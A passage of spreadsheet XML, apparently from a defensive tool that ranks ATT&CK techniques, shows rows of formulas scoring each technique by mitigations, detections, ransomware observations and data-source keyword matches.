        <v>0.1</v>
      </c>
      <c r="M283" s="25">
        <v>0</v>
      </c>
      <c r="N283" s="51">
        <v>0</v>
      </c>
      <c r="O283" s="51">
        <v>4</v>
      </c>
      <c r="P283" s="51">
        <v>1</v>
      </c>
      <c r="Q283" s="51">
        <v>0</v>
      </c>
      <c r="R283" s="51">
        <v>4.0999999999999996</v>
      </c>
      <c r="S283" s="51">
        <v>1</v>
      </c>
      <c r="T283" s="52" t="s">
        <v>1186</v>
      </c>
      <c r="U283" s="51">
        <v>13</v>
      </c>
      <c r="V283" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15714285714285714</v>
      </c>
      <c r="W283">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X283">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y283">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z283">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA283">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB283">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC283" s="29" t="s">
        <v>1187</v>
      </c>
      <c r="AD283" s="25" t="str" cm="1">
        <f t="array" ref="AD283">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC283)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE283" s="25">
        <f>IF(AD283="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF283" s="25" t="str" cm="1">
        <f t="array" ref="AF283">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC283)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG283" s="25">
        <f>IF(AF283="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH283" s="25" t="str" cm="1">
        <f t="array" ref="AH283">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC283)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI283" s="25">
        <f>IF(AH283="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ283" s="25" t="str" cm="1">
        <f t="array" ref="AJ283">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC283)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK283" s="25">
        <f>IF(AJ283="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL283" s="25" t="str" cm="1">
        <f t="array" ref="AL283">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC283)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM283" s="25">
        <f>IF(AL283="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN283" s="52">
        <v>0</v>
      </c>
      <c r="AO283" s="51">
        <v>0</v>
      </c>
      <c r="AP283" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.080571428571428E-2</v>
      </c>
      <c r="AQ283" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10268571428571427</v>
      </c>
      <c r="AR283" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10268571428571427</v>
      </c>
      <c r="AS283" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT283" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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84" spans="1:47" ht="48">
      <c r="A284" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.6225238095238095E-2</v>
      </c>
      <c r="B284" s="25">
        <f>SUM(H284,M284,V284)*(1+SUM(AE284,AG284,AI284,AK284,AM284))</f>
        <v>0.36225238095238099</v>
      </c>
      <c r="C284" s="25" t="s">
        <v>1188</v>
      </c>
      <c r="D284" s="25" t="s">
        <v>1189</v>
      </c>
      <c r="E284" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F284" s="51">
        <v>1</v>
      </c>
      <c r="G284" s="51">
        <v>2</v>
      </c>
      <c r="H284" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I284">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J284">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K284">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L284">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M284" s="25">
        <v>0</v>
      </c>
      <c r="N284" s="51">
        <v>0</v>
      </c>
      <c r="O284" s="51">
        <v>0</v>
      </c>
      <c r="P284" s="51">
        <v>0</v>
      </c>
      <c r="Q284" s="51">
        <v>0</v>
      </c>
      <c r="R284" s="52" t="s">
        <v>511</v>
      </c>
      <c r="S284" s="51">
        <v>9</v>
      </c>
      <c r="T284" s="52" t="s">
        <v>1190</v>
      </c>
      <c r="U284" s="51">
        <v>7</v>
      </c>
      <c r="V284" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15238095238095239</v>
      </c>
      <c r="W284">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X284">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y284">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z284">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA284">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB284">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC284" s="29" t="s">
        <v>1191</v>
      </c>
      <c r="AD284" s="25" t="str" cm="1">
        <f t="array" ref="AD284">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC284)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE284" s="25">
        <f>IF(AD284="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF284" s="25" t="str" cm="1">
        <f t="array" ref="AF284">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC284)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG284" s="25">
        <f>IF(AF284="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH284" s="25" t="str" cm="1">
        <f t="array" ref="AH284">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC284)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI284" s="25">
        <f>IF(AH284="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ284" s="25" t="str" cm="1">
        <f t="array" ref="AJ284">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC284)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK284" s="25">
        <f>IF(AJ284="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL284" s="25" t="str" cm="1">
        <f t="array" ref="AL284">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC284)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM284" s="25">
        <f>IF(AL284="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN284" s="52">
        <v>0</v>
      </c>
      <c r="AO284" s="51">
        <v>0</v>
      </c>
      <c r="AP284" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.6225238095238095E-2</v>
      </c>
      <c r="AQ284" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12075079365079366</v>
      </c>
      <c r="AR284" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12075079365079366</v>
      </c>
      <c r="AS284" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT284" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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85" spans="1:47" ht="63.95">
      <c r="A285" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6899999999999987E-2</v>
      </c>
      <c r="B285" s="25">
        <f>SUM(H285,M285,V285)*(1+SUM(AE285,AG285,AI285,AK285,AM285))</f>
        <v>0.33566666666666667</v>
      </c>
      <c r="C285" s="25" t="s">
        <v>1192</v>
      </c>
      <c r="D285" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E285" s="25" t="s">
        <v>1193</v>
      </c>
      <c r="F285" s="51">
        <v>1</v>
      </c>
      <c r="G285" s="51">
        <v>1</v>
      </c>
      <c r="H285" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I285">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J285">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K285">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L285">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M285" s="25">
        <v>0</v>
      </c>
      <c r="N285" s="51">
        <v>0</v>
      </c>
      <c r="O285" s="51">
        <v>0</v>
      </c>
      <c r="P285" s="51">
        <v>0</v>
      </c>
      <c r="Q285" s="51">
        <v>0</v>
      </c>
      <c r="R285" s="52" t="s">
        <v>1194</v>
      </c>
      <c r="S285" s="51">
        <v>7</v>
      </c>
      <c r="T285" s="51" t="s">
        <v>1195</v>
      </c>
      <c r="U285" s="51">
        <v>9</v>
      </c>
      <c r="V285" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15238095238095239</v>
      </c>
      <c r="W285">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X285">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y285">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z285">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA285">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB285">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC285" s="29" t="s">
        <v>1196</v>
      </c>
      <c r="AD285" s="25" t="str" cm="1">
        <f t="array" ref="AD285">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC285)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE285" s="25">
        <f>IF(AD285="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF285" s="25" t="str" cm="1">
        <f t="array" ref="AF285">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC285)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG285" s="25">
        <f>IF(AF285="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH285" s="25" t="str" cm="1">
        <f t="array" ref="AH285">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC285)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI285" s="25">
        <f>IF(AH285="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ285" s="25" t="str" cm="1">
        <f t="array" ref="AJ285">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC285)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK285" s="25">
        <f>IF(AJ285="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL285" s="25" t="str" cm="1">
        <f t="array" ref="AL285">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC285)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM285" s="25">
        <f>IF(AL285="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN285" s="58">
        <v>1</v>
      </c>
      <c r="AO285" s="51">
        <v>1</v>
      </c>
      <c r="AP285" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6899999999999987E-2</v>
      </c>
      <c r="AQ285" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11188888888888888</v>
      </c>
      <c r="AR285" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11188888888888888</v>
      </c>
      <c r="AS285" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT285" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU28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86" spans="1:47" ht="48">
      <c r="A286" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.1902857142857148E-2</v>
      </c>
      <c r="B286" s="25">
        <f>SUM(H286,M286,V286)*(1+SUM(AE286,AG286,AI286,AK286,AM286))</f>
        <v>0.28569523809523811</v>
      </c>
      <c r="C286" s="25" t="s">
        <v>1197</v>
      </c>
      <c r="D286" s="25" t="s">
        <v>152</v>
      </c>
      <c r="E286" s="25" t="s">
        <v>1198</v>
      </c>
      <c r="F286" s="51">
        <v>1</v>
      </c>
      <c r="G286" s="51">
        <v>1</v>
      </c>
      <c r="H286" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I286">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J286">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K286">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L286">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M286" s="25">
        <v>0</v>
      </c>
      <c r="N286" s="51">
        <v>2</v>
      </c>
      <c r="O286" s="51">
        <v>6</v>
      </c>
      <c r="P286" s="51">
        <v>2</v>
      </c>
      <c r="Q286" s="51">
        <v>0</v>
      </c>
      <c r="R286" s="52" t="s">
        <v>967</v>
      </c>
      <c r="S286" s="51">
        <v>5</v>
      </c>
      <c r="T286" s="52" t="s">
        <v>1199</v>
      </c>
      <c r="U286" s="51">
        <v>6</v>
      </c>
      <c r="V286" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15238095238095239</v>
      </c>
      <c r="W286">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>11</v>
      </c>
      <c r="X286">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.2</v>
      </c>
      <c r="Y286">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="Z286">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>10</v>
      </c>
      <c r="AA286">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.1</v>
      </c>
      <c r="AB286">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.1</v>
      </c>
      <c r="AC286" s="29" t="s">
        <v>938</v>
      </c>
      <c r="AD286" s="25" t="str" cm="1">
        <f t="array" ref="AD286">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC286)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE286" s="25">
        <f>IF(AD286="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF286" s="25" t="str" cm="1">
        <f t="array" ref="AF286">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC286)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG286" s="25">
        <f>IF(AF286="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH286" s="25" t="str" cm="1">
        <f t="array" ref="AH286">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC286)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI286" s="25">
        <f>IF(AH286="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ286" s="25" t="str" cm="1">
        <f t="array" ref="AJ286">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC286)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK286" s="25">
        <f>IF(AJ286="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL286" s="25" t="str" cm="1">
        <f t="array" ref="AL286">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC286)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM286" s="25">
        <f>IF(AL286="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN286" s="52">
        <v>1</v>
      </c>
      <c r="AO286" s="51">
        <v>1</v>
      </c>
      <c r="AP286" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.1902857142857148E-2</v>
      </c>
      <c r="AQ286" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.5231746031746042E-2</v>
      </c>
      <c r="AR286" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.5231746031746042E-2</v>
      </c>
      <c r="AS286" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT286" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU28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87" spans="1:47" ht="48">
      <c r="A287" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3566666666666661E-2</v>
      </c>
      <c r="B287" s="25">
        <f>SUM(H287,M287,V287)*(1+SUM(AE287,AG287,AI287,AK287,AM287))</f>
        <v>0.33566666666666667</v>
      </c>
      <c r="C287" s="25" t="s">
        <v>1200</v>
      </c>
      <c r="D287" s="25" t="s">
        <v>99</v>
      </c>
      <c r="E287" s="25" t="s">
        <v>1201</v>
      </c>
      <c r="F287" s="51">
        <v>1</v>
      </c>
      <c r="G287" s="51">
        <v>1</v>
      </c>
      <c r="H287" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I287">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J287">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K287">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L287">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M287" s="25">
        <v>0</v>
      </c>
      <c r="N287" s="51">
        <v>0</v>
      </c>
      <c r="O287" s="51">
        <v>0</v>
      </c>
      <c r="P287" s="51">
        <v>0</v>
      </c>
      <c r="Q287" s="51">
        <v>0</v>
      </c>
      <c r="R287" s="52" t="s">
        <v>1202</v>
      </c>
      <c r="S287" s="51">
        <v>10</v>
      </c>
      <c r="T287" s="52" t="s">
        <v>1112</v>
      </c>
      <c r="U287" s="51">
        <v>6</v>
      </c>
      <c r="V287" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15238095238095239</v>
      </c>
      <c r="W287">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X287">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y287">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z287">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA287">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB287">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC287" s="29" t="s">
        <v>1203</v>
      </c>
      <c r="AD287" s="25" t="str" cm="1">
